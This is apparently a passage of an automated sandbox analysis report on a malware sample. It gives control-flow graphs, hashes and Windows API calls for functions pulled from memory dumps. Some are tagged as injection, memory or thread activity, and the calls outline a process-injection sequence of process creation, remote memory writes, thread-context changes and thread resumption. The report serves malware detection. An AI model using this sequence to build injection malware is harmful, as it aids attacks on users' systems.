                      control_flow_graph 573 2cd2320-2cd23b5 575 2cd23ee-2cd240e 573->575 576 2cd23b7-2cd23c1 573->576 583 2cd2447-2cd2476 575->583 584 2cd2410-2cd241a 575->584 576->575 577 2cd23c3-2cd23c5 576->577 578 2cd23e8-2cd23eb 577->578 579 2cd23c7-2cd23d1 577->579 578->575 581 2cd23d5-2cd23e4 579->581 582 2cd23d3 579->582 581->581 586 2cd23e6 581->586 582->581 592 2cd24af-2cd2569 CreateProcessA 583->592 593 2cd2478-2cd2482 583->593 584->583 585 2cd241c-2cd241e 584->585 587 2cd2441-2cd2444 585->587 588 2cd2420-2cd242a 585->588 586->578 587->583 590 2cd242c 588->590 591 2cd242e-2cd243d 588->591 590->591 591->591 594 2cd243f 591->594 604 2cd256b-2cd2571 592->604 605 2cd2572-2cd25f8 592->605 593->592 595 2cd2484-2cd2486 593->595 594->587 597 2cd24a9-2cd24ac 595->597 598 2cd2488-2cd2492 595->598 597->592 599 2cd2494 598->599 600 2cd2496-2cd24a5 598->600 599->600 600->600 602 2cd24a7 600->602 602->597 604->605 615 2cd2608-2cd260c 605->615 616 2cd25fa-2cd25fe 605->616 618 2cd261c-2cd2620 615->618 619 2cd260e-2cd2612 615->619 616->615 617 2cd2600 616->617 617->615 620 2cd2630-2cd2634 618->620 621 2cd2622-2cd2626 618->621 619->618 622 2cd2614 619->622 624 2cd2646-2cd264d 620->624 625 2cd2636-2cd263c 620->625 621->620 623 2cd2628 621->623 622->618 623->620 626 2cd264f-2cd265e 624->626 627 2cd2664 624->627 625->624 626->627 629 2cd2665 627->629 629->629
                      APIs
                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02CD2556
                      Memory Dump Source
                      • Source File: 00000000.00000002.1329657168.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2cd0000_03.jbxd
                      Similarity
                      • API ID: CreateProcess
                      • String ID:
                      • API String ID: 963392458-0
                      • Opcode ID: 061e3d5f6ab8596beb8a8d3c54dc42610f7e80799b44180d1d656d9112560461
                      • Instruction ID: 9095a2ed1ff1891e8e3435ed87766f372d5c20567c249b71b60d28f13a20aacd
                      • Opcode Fuzzy Hash: 061e3d5f6ab8596beb8a8d3c54dc42610f7e80799b44180d1d656d9112560461
                      • Instruction Fuzzy Hash: 90914971D00319CFEB20CF69C840BEEBBB2AF88314F148569DD19A7241DB749A85CF92
                      Function 0105ADA8 Relevance: 1.7, APIs: 1, Instructions: 197COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1142 105ada8-105adb7 1143 105ade3-105ade7 1142->1143 1144 105adb9-105adc6 call 105a100 1142->1144 1146 105ade9-105adf3 1143->1146 1147 105adfb-105ae3c 1143->1147 1150 105addc 1144->1150 1151 105adc8 1144->1151 1146->1147 1153 105ae3e-105ae46 1147->1153 1154 105ae49-105ae57 1147->1154 1150->1143 1200 105adce call 105b031 1151->1200 1201 105adce call 105b040 1151->1201 1153->1154 1155 105ae59-105ae5e 1154->1155 1156 105ae7b-105ae7d 1154->1156 1158 105ae60-105ae67 call 105a10c 1155->1158 1159 105ae69 1155->1159 1160 105ae80-105ae87 1156->1160 1157 105add4-105add6 1157->1150 1161 105af18-105af2f 1157->1161 1163 105ae6b-105ae79 1158->1163 1159->1163 1164 105ae94-105ae9b 1160->1164 1165 105ae89-105ae91 1160->1165 1173 105af31-105af90 1161->1173 1163->1160 1167 105ae9d-105aea5 1164->1167 1168 105aea8-105aeaa call 105a11c 1164->1168 1165->1164 1167->1168 1171 105aeaf-105aeb1 1168->1171 1174 105aeb3-105aebb 1171->1174 1175 105aebe-105aec3 1171->1175 1193 105af92-105afd8 1173->1193 1174->1175 1176 105aec5-105aecc 1175->1176 1177 105aee1-105aeee 1175->1177 1176->1177 1179 105aece-105aede call 105a12c call 105a13c 1176->1179 1184 105af11-105af17 1177->1184 1185 105aef0-105af0e 1177->1185 1179->1177 1185->1184 1195 105afe0-105b00b GetModuleHandleW 1193->1195 1196 105afda-105afdd 1193->1196 1197 105b014-105b028 1195->1197 1198 105b00d-105b013 1195->1198 1196->1195 1198->1197 1200->1157 1201->1157
                      APIs
                      • GetModuleHandleW.KERNELBASE(00000000), ref: 0105AFFE
                      Memory Dump Source
                      • Source File: 00000000.00000002.1328667414.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1050000_03.jbxd
                      Similarity
                      • API ID: HandleModule
                      • String ID:
                      • API String ID: 4139908857-0
                      • Opcode ID: e045b8c2405c6efb91fdece285c72be533c22f9d8de68a8b0c153dcfcaa88bcf
                      • Instruction ID: d7a3137ca1c020c6b8d2d22e5e99353a8c87361c3dd5eae9398baa279213e641
                      • Opcode Fuzzy Hash: e045b8c2405c6efb91fdece285c72be533c22f9d8de68a8b0c153dcfcaa88bcf
                      • Instruction Fuzzy Hash: B5712370A00B05CFEBA4DF6AD44475BBBF5BF48304F008A2AD98A97A50DB75E845CB90
                      Function 053618E5 Relevance: 1.6, APIs: 1, Instructions: 115COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1202 53618e5-5361956 1203 5361961-5361968 1202->1203 1204 5361958-536195e 1202->1204 1205 5361973-5361a12 CreateWindowExW 1203->1205 1206 536196a-5361970 1203->1206 1204->1203 1208 5361a14-5361a1a 1205->1208 1209 5361a1b-5361a53 1205->1209 1206->1205 1208->1209 1213 5361a55-5361a58 1209->1213 1214 5361a60 1209->1214 1213->1214 1215 5361a61 1214->1215 1215->1215
                      APIs
                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05361A02
                      Memory Dump Source
                      • Source File: 00000000.00000002.1340906375.0000000005360000.00000040.00000800.00020000.00000000.sdmp, Offset: 05360000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5360000_03.jbxd
                      Similarity
                      • API ID: CreateWindow
                      • String ID:
                      • API String ID: 716092398-0
                      • Opcode ID: 2f49faa2af1f705382ab182e8a25bffae70ed6da09a84e1fd7cec6cd33b70b6b
                      • Instruction ID: 20aed42dbff6c6ee772d2e57a1135b4f984da67e59d2eddd2d900eab0ed51f67
                      • Opcode Fuzzy Hash: 2f49faa2af1f705382ab182e8a25bffae70ed6da09a84e1fd7cec6cd33b70b6b
                      • Instruction Fuzzy Hash: 7251C1B5D10349DFDB14CF99D984ADEBBB5BF48300F24812EE819AB214D7B49945CF90
                      Function 053618F0 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1216 53618f0-5361956 1217 5361961-5361968 1216->1217 1218 5361958-536195e 1216->1218 1219 5361973-5361a12 CreateWindowExW 1217->1219 1220 536196a-5361970 1217->1220 1218->1217 1222 5361a14-5361a1a 1219->1222 1223 5361a1b-5361a53 1219->1223 1220->1219 1222->1223 1227 5361a55-5361a58 1223->1227 1228 5361a60 1223->1228 1227->1228 1229 5361a61 1228->1229 1229->1229
                      APIs
                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05361A02
                      Memory Dump Source
                      • Source File: 00000000.00000002.1340906375.0000000005360000.00000040.00000800.00020000.00000000.sdmp, Offset: 05360000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5360000_03.jbxd
                      Similarity
                      • API ID: CreateWindow
                      • String ID:
                      • API String ID: 716092398-0
                      • Opcode ID: 092834ed869f2a1b4814e779becc3a5a9158054483708a9443e3a4d1e248e433
                      • Instruction ID: 7d862215c6a04c9cd01b20c70e0ef7b3b4433adb107ca51240af773c763b1dfe
                      • Opcode Fuzzy Hash: 092834ed869f2a1b4814e779becc3a5a9158054483708a9443e3a4d1e248e433
                      • Instruction Fuzzy Hash: D041C1B5D10349DFDB14CF9AD884ADEBBB5BF48310F24812EE819AB214D7B0A945CF90
                      Function 010544E0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1230 10544e0-10559d9 CreateActCtxA 1233 10559e2-1055a3c 1230->1233 1234 10559db-10559e1 1230->1234 1241 1055a3e-1055a41 1233->1241 1242 1055a4b-1055a4f 1233->1242 1234->1233 1241->1242 1243 1055a51-1055a5d 1242->1243 1244 1055a60 1242->1244 1243->1244 1245 1055a61 1244->1245 1245->1245
                      APIs
                      • CreateActCtxA.KERNEL32(?), ref: 010559C9
                      Memory Dump Source
                      • Source File: 00000000.00000002.1328667414.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1050000_03.jbxd
                      Similarity
                      • API ID: Create
                      • String ID:
                      • API String ID: 2289755597-0
                      • Opcode ID: 8c8715732f873cf3200b24db61bd3ffaf076631f301a170d296f460ef8ac73ff
                      • Instruction ID: 9b9e43be1000ae8ee68d3fadad5e6bec99878ea73e57bcd0f245e32064ab01b8
                      • Opcode Fuzzy Hash: 8c8715732f873cf3200b24db61bd3ffaf076631f301a170d296f460ef8ac73ff
                      • Instruction Fuzzy Hash: DF41D2B1C0071DCBEB24CFA9C884B8EBBF5BF49704F20846AD448AB251DB756949CF90
                      Function 0105590C Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1247 105590c-10559d9 CreateActCtxA 1249 10559e2-1055a3c 1247->1249 1250 10559db-10559e1 1247->1250 1257 1055a3e-1055a41 1249->1257 1258 1055a4b-1055a4f 1249->1258 1250->1249 1257->1258 1259 1055a51-1055a5d 1258->1259 1260 1055a60 1258->1260 1259->1260 1261 1055a61 1260->1261 1261->1261
                      APIs
                      • CreateActCtxA.KERNEL32(?), ref: 010559C9
                      Memory Dump Source
                      • Source File: 00000000.00000002.1328667414.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1050000_03.jbxd
                      Similarity
                      • API ID: Create
                      • String ID:
                      • API String ID: 2289755597-0
                      • Opcode ID: 72caa53eb06aa37b526e29995c0f753d1d531bf60054631fd0c55865df624485
                      • Instruction ID: fba39f5e5130976e2c85d769c2e6066a754f42f6ef1267e093af89211364798a
                      • Opcode Fuzzy Hash: 72caa53eb06aa37b526e29995c0f753d1d531bf60054631fd0c55865df624485
                      • Instruction Fuzzy Hash: 1441E0B1C00719CFEB24CFA9C885B8EBBF5BF49704F20846AD448AB251DB756949CF50
                      Function 05364050 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1263 5364050-536408c 1264 5364092-5364097 1263->1264 1265 536413c-536415c 1263->1265 1266 53640ea-5364122 CallWindowProcW 1264->1266 1267 5364099-53640d0 1264->1267 1272 536415f-536416c 1265->1272 1268 5364124-536412a 1266->1268 1269 536412b-536413a 1266->1269 1273 53640d2-53640d8 1267->1273 1274 53640d9-53640e8 1267->1274 1268->1269 1269->1272 1273->1274 1274->1272
                      APIs
                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 05364111
                      Memory Dump Source
                      • Source File: 00000000.00000002.1340906375.0000000005360000.00000040.00000800.00020000.00000000.sdmp, Offset: 05360000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5360000_03.jbxd
                      Similarity
                      • API ID: CallProcWindow
                      • String ID:
                      • API String ID: 2714655100-0
                      • Opcode ID: da601171ec6cefe52478fad6634fea156902c19ad4d7a7f0f8472e7171515ebe
                      • Instruction ID: a716936d37e9f76635271ffa0d8da13083ebd25c5b04c084b64fa414f836e9be
                      • Opcode Fuzzy Hash: da601171ec6cefe52478fad6634fea156902c19ad4d7a7f0f8472e7171515ebe
                      • Instruction Fuzzy Hash: CC410AB9A00309CFDB14CF95C488AAABBF5FF88314F24C459D519A7365D775A841CFA0
                      Function 02CD2181 Relevance: 1.6, APIs: 1, Instructions: 79COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1277 2cd2181-2cd2185 1278 2cd2187-2cd2215 ReadProcessMemory 1277->1278 1279 2cd2152-2cd216e 1277->1279 1282 2cd221e-2cd224e 1278->1282 1283 2cd2217-2cd221d 1278->1283 1283->1282
                      APIs
                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02CD2208
                      Memory Dump Source
                      • Source File: 00000000.00000002.1329657168.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2cd0000_03.jbxd
                      Similarity
                      • API ID: MemoryProcessRead
                      • String ID:
                      • API String ID: 1726664587-0
                      • Opcode ID: 227969be4308c4cd0bbee64fcacaf6f0160acf90df5be3b326b63a561d818497
                      • Instruction ID: 5876e54ac77b6a806f95a1480f4622d7555ecd2fc07d519b414fe07d05da4d9e
                      • Opcode Fuzzy Hash: 227969be4308c4cd0bbee64fcacaf6f0160acf90df5be3b326b63a561d818497
                      • Instruction Fuzzy Hash: B5317C72D0024ADFDB10CFA9D8817EEFBB0FF48320F54846AE958A7241C7799515CB61
                      Function 02CD2090 Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1300 2cd2090-2cd20e6 1302 2cd20e8-2cd20f4 1300->1302 1303 2cd20f6-2cd2135 WriteProcessMemory 1300->1303 1302->1303 1305 2cd213e-2cd216e 1303->1305 1306 2cd2137-2cd213d 1303->1306 1306->1305
                      APIs
                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 02CD2128
                      Memory Dump Source
                      • Source File: 00000000.00000002.1329657168.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2cd0000_03.jbxd
                      Similarity
                      • API ID: MemoryProcessWrite
                      • String ID:
                      • API String ID: 3559483778-0
                      • Opcode ID: 3769006b216fa7aaaee19d45aa8344eb34d409f1c977fe4b31e32da58b7de456
                      • Instruction ID: c7ca2778e13825ea429614bec699c446cfaa1ad287781e11653aadf0d370cc25
                      • Opcode Fuzzy Hash: 3769006b216fa7aaaee19d45aa8344eb34d409f1c977fe4b31e32da58b7de456
                      • Instruction Fuzzy Hash: 5721267190034A9FDB10CFA9C8857EEBBF1FF48310F14842AE959A7241C7789945CBA1
                      Function 02CD1FD0 Relevance: 1.6, APIs: 1, Instructions: 71memoryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1287 2cd1fd0-2cd1fd5 1288 2cd1fd7-2cd2053 VirtualAllocEx 1287->1288 1289 2cd1fa2-2cd1fc2 1287->1289 1295 2cd205c-2cd2081 1288->1295 1296 2cd2055-2cd205b 1288->1296 1296->1295
                      APIs
                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02CD2046
                      Memory Dump Source
                      • Source File: 00000000.00000002.1329657168.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2cd0000_03.jbxd
                      Similarity
                      • API ID: AllocVirtual
                      • String ID:
                      • API String ID: 4275171209-0
                      • Opcode ID: 7aa4082022a4d9fa1d2a53ec39a4b2f1950111944420ad789863c1c51d7c2fac
                      • Instruction ID: fdbdd0054c8600d84ec0f85c858cdfddcbd49ebbeb8a96031981bea26259921d
                      • Opcode Fuzzy Hash: 7aa4082022a4d9fa1d2a53ec39a4b2f1950111944420ad789863c1c51d7c2fac
                      • Instruction Fuzzy Hash: CA214872900249CFDF10CFA9D8446EEBBF1EF88324F14841AE519A7250C776A915CFA0
                      Function 02CD2098 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1310 2cd2098-2cd20e6 1312 2cd20e8-2cd20f4 1310->1312 1313 2cd20f6-2cd2135 WriteProcessMemory 1310->1313 1312->1313 1315 2cd213e-2cd216e 1313->1315 1316 2cd2137-2cd213d 1313->1316 1316->1315
                      APIs
                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 02CD2128
                      Memory Dump Source
                      • Source File: 00000000.00000002.1329657168.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2cd0000_03.jbxd
                      Similarity
                      • API ID: MemoryProcessWrite
                      • String ID:
                      • API String ID: 3559483778-0
                      • Opcode ID: f4d3828bdb4c74da0a621ac76a3457f223dc8acb23934e560c07ee334d381bf3
                      • Instruction ID: aa7cde1171678ea7d56a1c75e9c44bcba975f171bcff88ea640ae75b8d333aea
                      • Opcode Fuzzy Hash: f4d3828bdb4c74da0a621ac76a3457f223dc8acb23934e560c07ee334d381bf3
                      • Instruction Fuzzy Hash: 582126729003499FDB10CFAAC985BDEBBF5FF48310F14842AE919A7241D7799944CBA1
                      Function 02CD1AC0 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1320 2cd1ac0-2cd1ac5 1321 2cd1ac7-2cd1b13 1320->1321 1322 2cd1a92 call 2cd1a97 1320->1322 1325 2cd1b15-2cd1b21 1321->1325 1326 2cd1b23-2cd1b26 1321->1326 1322->1320 1325->1326 1327 2cd1b2d-2cd1b53 Wow64SetThreadContext 1326->1327 1328 2cd1b5c-2cd1b8c 1327->1328 1329 2cd1b55-2cd1b5b 1327->1329 1329->1328
                      APIs
                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 02CD1B46
                      Memory Dump Source
                      • Source File: 00000000.00000002.1329657168.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2cd0000_03.jbxd
                      Similarity
                      • API ID: ContextThreadWow64
                      • String ID:
                      • API String ID: 983334009-0
                      • Opcode ID: 44b1f50d1624ba86beec4aef5844847f26540182340f8bf9d4e082e33e381c7b
                      • Instruction ID: 4699dbf7e6a50371a5d41730153d612b67bc2237b34fa50ce30f890b599f4480
                      • Opcode Fuzzy Hash: 44b1f50d1624ba86beec4aef5844847f26540182340f8bf9d4e082e33e381c7b
                      • Instruction Fuzzy Hash: A9219AB1D003099FDB10CFAAC4807EEBBF4AF49214F18802AD558A7240D7B89A44CFA0
                      Function 0105B790 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                      Download Yara Rule
                      APIs
                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0105D646,?,?,?,?,?), ref: 0105D707
                      Memory Dump Source
                      • Source File: 00000000.00000002.1328667414.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1050000_03.jbxd
                      Similarity
                      • API ID: DuplicateHandle
                      • String ID:
                      • API String ID: 3793708945-0
                      • Opcode ID: b1a4bcf9ac61151eb371d7166959cabb3c65416ed50e5cbd4756fd40850ae0e9
                      • Instruction ID: 4aa64bc2c9e45185f52beb94af1ed5c6fbd852acbe90a2ffb9edd7cba4ca406c
                      • Opcode Fuzzy Hash: b1a4bcf9ac61151eb371d7166959cabb3c65416ed50e5cbd4756fd40850ae0e9
                      • Instruction Fuzzy Hash: 2E21E3B5910249DFDB10CFAAD884ADEBBF4FB48310F14845AE958A3350D374A954CFA4
                      Function 02CD1AC8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                      Download Yara Rule
                      APIs
                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 02CD1B46
                      Memory Dump Source
                      • Source File: 00000000.00000002.1329657168.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2cd0000_03.jbxd
                      Similarity
                      • API ID: ContextThreadWow64
                      • String ID:
                      • API String ID: 983334009-0
                      • Opcode ID: 5698594929b5328e5fa9464ebc4a168183eb93a3045af13f753da8bc4b245921
                      • Instruction ID: fe62797e7d0507fda8f9046354cc66f115caf5a015d8c41300ca1146f9541beb
                      • Opcode Fuzzy Hash: 5698594929b5328e5fa9464ebc4a168183eb93a3045af13f753da8bc4b245921
                      • Instruction Fuzzy Hash: 242129B1D003099FDB10DFAAC4857EEBBF4EF48214F54842AD559A7240D7B89A44CFA1
                      Function 02CD2188 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                      Download Yara Rule
                      APIs
                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02CD2208
                      Memory Dump Source
                      • Source File: 00000000.00000002.1329657168.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2cd0000_03.jbxd
                      Similarity
                      • API ID: MemoryProcessRead
                      • String ID:
                      • API String ID: 1726664587-0
                      • Opcode ID: da16a37e39d7509bdfc1888fc1c48695984c49ab5cfc090829af01ca9706e9eb
                      • Instruction ID: 50786f317d706f046f97ce2375eaefa9c0c737589501a5ae71ae1b8897c3cd13
                      • Opcode Fuzzy Hash: da16a37e39d7509bdfc1888fc1c48695984c49ab5cfc090829af01ca9706e9eb
                      • Instruction Fuzzy Hash: 422128B18003499FDB10CFAAC880BEEFBF5FF48320F54842AE919A7240C7799544CBA1
                      Function 0105D678 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                      Download Yara Rule
                      APIs
                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0105D646,?,?,?,?,?), ref: 0105D707
                      Memory Dump Source
                      • Source File: 00000000.00000002.1328667414.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1050000_03.jbxd
                      Similarity
                      • API ID: DuplicateHandle
                      • String ID:
                      • API String ID: 3793708945-0
                      • Opcode ID: 8f72cea7a7a3dca427c60b662e591ee58236e917df3f40c2be97dee24e43e569
                      • Instruction ID: 4f4710840b4794671f47feda4cfc212179fc62302d6fb1dcf58f10279c1dc135
                      • Opcode Fuzzy Hash: 8f72cea7a7a3dca427c60b662e591ee58236e917df3f40c2be97dee24e43e569
                      • Instruction Fuzzy Hash: C021E0B5910249EFDB10CFAAD984ADEBBF5FB48310F14801AE958B3350D378A954CF60
                      Function 0105A168 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                      Download Yara Rule
                      APIs
                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0105B079,00000800,00000000,00000000), ref: 0105B28A
                      Memory Dump Source
                      • Source File: 00000000.00000002.1328667414.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1050000_03.jbxd
                      Similarity
                      • API ID: LibraryLoad
                      • String ID:
                      • API String ID: 1029625771-0
                      • Opcode ID: 295fb3fc50876fce1f13a4284d34625cf12ed6501fad1bb5d1f6f2da5f012557
                      • Instruction ID: 5944f6f95cf79ce5f45c3a336525e56868031ec5867eb38f7aeefa2b944e97d4
                      • Opcode Fuzzy Hash: 295fb3fc50876fce1f13a4284d34625cf12ed6501fad1bb5d1f6f2da5f012557
                      • Instruction Fuzzy Hash: 1C1112B6900349CFDB20CF9AD444BEEFBF5EB48310F10846AE959A7600C3B5A945CFA5
                      Function 0105B219 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                      Download Yara Rule
                      APIs
                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0105B079,00000800,00000000,00000000), ref: 0105B28A
                      Memory Dump Source
                      • Source File: 00000000.00000002.1328667414.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1050000_03.jbxd
                      Similarity
                      • API ID: LibraryLoad
                      • String ID:
                      • API String ID: 1029625771-0
                      • Opcode ID: b73f3ad89240baace529bd2d184e0689e8d147c5752e31aeabadc4a2ca58bb0d
                      • Instruction ID: 76dfe435f285e680bf3b7158f5e48d2ba89c5d730c5194740aa4d88d625a09cf
                      • Opcode Fuzzy Hash: b73f3ad89240baace529bd2d184e0689e8d147c5752e31aeabadc4a2ca58bb0d
                      • Instruction Fuzzy Hash: DA1112B68003498FDB10CFAAD844BDEFBF5EB48310F14846AE959A7640C3B5A545CFA5
                      Function 02CD1FD8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                      Download Yara Rule
                      APIs
                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02CD2046
                      Memory Dump Source
                      • Source File: 00000000.00000002.1329657168.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2cd0000_03.jbxd
                      Similarity
                      • API ID: AllocVirtual
                      • String ID:
                      • API String ID: 4275171209-0
                      • Opcode ID: a581b27a528bf4b91c344abea4fda972fa89f5399ab2ce2ba479b54bdcef38e7
                      • Instruction ID: 6255da0958106eb36a19cb7940440e2a6b2ca1e10e406c32a6ef45b8c867bda5
                      • Opcode Fuzzy Hash: a581b27a528bf4b91c344abea4fda972fa89f5399ab2ce2ba479b54bdcef38e7
                      • Instruction Fuzzy Hash: EC112672900249DFDB10DFAAD844BDEBBF5EF48310F14841AE919A7250C779A944CBA1
                      Function 02CD1A10 Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON
                      Download Yara Rule
                      APIs
                      • ResumeThread.KERNELBASE(?), ref: 02CD1A7A
                      Memory Dump Source
                      • Source File: 00000000.00000002.1329657168.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2cd0000_03.jbxd
                      Similarity
                      • API ID: ResumeThread
                      • String ID:
                      • API String ID: 947044025-0
                      • Opcode ID: 8cc137ab207d3714f2a4e0087d229235ce18feb465a4db4aebdf11e8e8890987
                      • Instruction ID: b29093517f495c6051fe8110a3a16b587d3f65aec071c4a6c68076a9f3e074a1
                      • Opcode Fuzzy Hash: 8cc137ab207d3714f2a4e0087d229235ce18feb465a4db4aebdf11e8e8890987
                      • Instruction Fuzzy Hash: 79118B75D003498FDB20CFAAD4447EEFBF4AF88214F24841AD559A7240C7795945CBA0
                      Function 02CD316C Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                      Download Yara Rule
                      APIs
                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 02CD507D
                      Memory Dump Source
                      • Source File: 00000000.00000002.1329657168.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2cd0000_03.jbxd
                      Similarity
                      • API ID: MessagePost
                      • String ID:
                      • API String ID: 410705778-0
                      • Opcode ID: ec3b06e1262783d999b0812b95548805a23ebf99fc3e7ab57ba9689850bbd05b
                      • Instruction ID: 3a9ea5a6400efaa94c5aef0e8fa13bbddd6be990e6fe8f7afbbe76c10f91e86c
                      • Opcode Fuzzy Hash: ec3b06e1262783d999b0812b95548805a23ebf99fc3e7ab57ba9689850bbd05b
                      • Instruction Fuzzy Hash: C111F2B5800349DFDB20DF9AD885BDEBBF8EB48310F50845AE919A7600C3B5A944CFE5
                      Function 0105AF98 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                      Download Yara Rule
                      APIs
                      • GetModuleHandleW.KERNELBASE(00000000), ref: 0105AFFE
                      Memory Dump Source
                      • Source File: 00000000.00000002.1328667414.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1050000_03.jbxd
                      Similarity
                      • API ID: HandleModule
                      • String ID:
                      • API String ID: 4139908857-0
                      • Opcode ID: e010b4b8028cb67bc6193c6a4ec1ff0024d477910a8f0bcb5f820c7a1b0a98eb
                      • Instruction ID: bc3196a17781a2a159de61ce3238a412206fbffe7db02df3894f846f6e937c26
                      • Opcode Fuzzy Hash: e010b4b8028cb67bc6193c6a4ec1ff0024d477910a8f0bcb5f820c7a1b0a98eb
                      • Instruction Fuzzy Hash: 61110FB6C002498FDB20CF9AD844B9EFBF4AB88214F10846AD969A7210D379A545CFA1
                      Function 02CD501F Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                      Download Yara Rule
                      APIs
                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 02CD507D
                      Memory Dump Source
